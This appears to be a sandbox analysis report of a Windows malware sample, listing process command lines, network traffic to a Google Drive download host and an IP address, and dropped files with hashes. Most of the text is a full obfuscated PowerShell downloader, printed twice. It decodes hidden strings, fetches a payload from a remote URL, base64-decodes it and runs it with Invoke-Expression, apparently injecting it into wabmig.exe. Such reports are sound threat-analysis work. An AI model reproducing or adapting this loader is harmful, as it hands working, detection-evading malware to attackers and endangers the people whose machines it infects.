"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 59.170.16.2.in-addr.arpa udp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp
NL 104.248.205.66:80 tcp

Files

memory/4424-0-0x00007FFAAAD13000-0x00007FFAAAD15000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbfgndax.3tz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4424-10-0x000001B385680000-0x000001B3856A2000-memory.dmp

memory/4424-11-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/4424-12-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/4424-14-0x00007FFAAAD13000-0x00007FFAAAD15000-memory.dmp

memory/4424-15-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/4424-17-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/3008-18-0x00000000024F0000-0x0000000002526000-memory.dmp

memory/3008-19-0x00000000050F0000-0x0000000005718000-memory.dmp

memory/3008-20-0x0000000004E30000-0x0000000004E52000-memory.dmp

memory/3008-21-0x0000000004ED0000-0x0000000004F36000-memory.dmp

memory/3008-22-0x0000000004FB0000-0x0000000005016000-memory.dmp

memory/3008-32-0x0000000005720000-0x0000000005A74000-memory.dmp

memory/3008-33-0x0000000005D20000-0x0000000005D3E000-memory.dmp

memory/3008-34-0x0000000005DB0000-0x0000000005DFC000-memory.dmp

memory/3008-35-0x0000000007550000-0x0000000007BCA000-memory.dmp

memory/3008-36-0x00000000062A0000-0x00000000062BA000-memory.dmp

memory/3008-37-0x0000000006FB0000-0x0000000007046000-memory.dmp

memory/3008-38-0x0000000006F40000-0x0000000006F62000-memory.dmp

memory/3008-39-0x0000000008180000-0x0000000008724000-memory.dmp

C:\Users\Admin\AppData\Roaming\Roborate.Uns

MD5 0b4940908143e7fa3180389a9b914557
SHA1 50985967f0dd7d2d8fdac35c66e6c066aba58aaf
SHA256 6e7664ac02af1fef33611b5150c64e285ca5c5bfda5bd555299c6df7b41f4d22
SHA512 eae1f4f22060ae85a31013cf9b904429e914018188eb519135e9ee747ff35b6a6426f665cd61cfb8724908658d11e80deb483901f4357c10cb5d207cb352e299

memory/3008-41-0x0000000008730000-0x000000000BAD6000-memory.dmp

memory/4424-42-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/3332-43-0x0000000001250000-0x00000000045F6000-memory.dmp

memory/3332-57-0x0000000001250000-0x00000000045F6000-memory.dmp

memory/4424-60-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b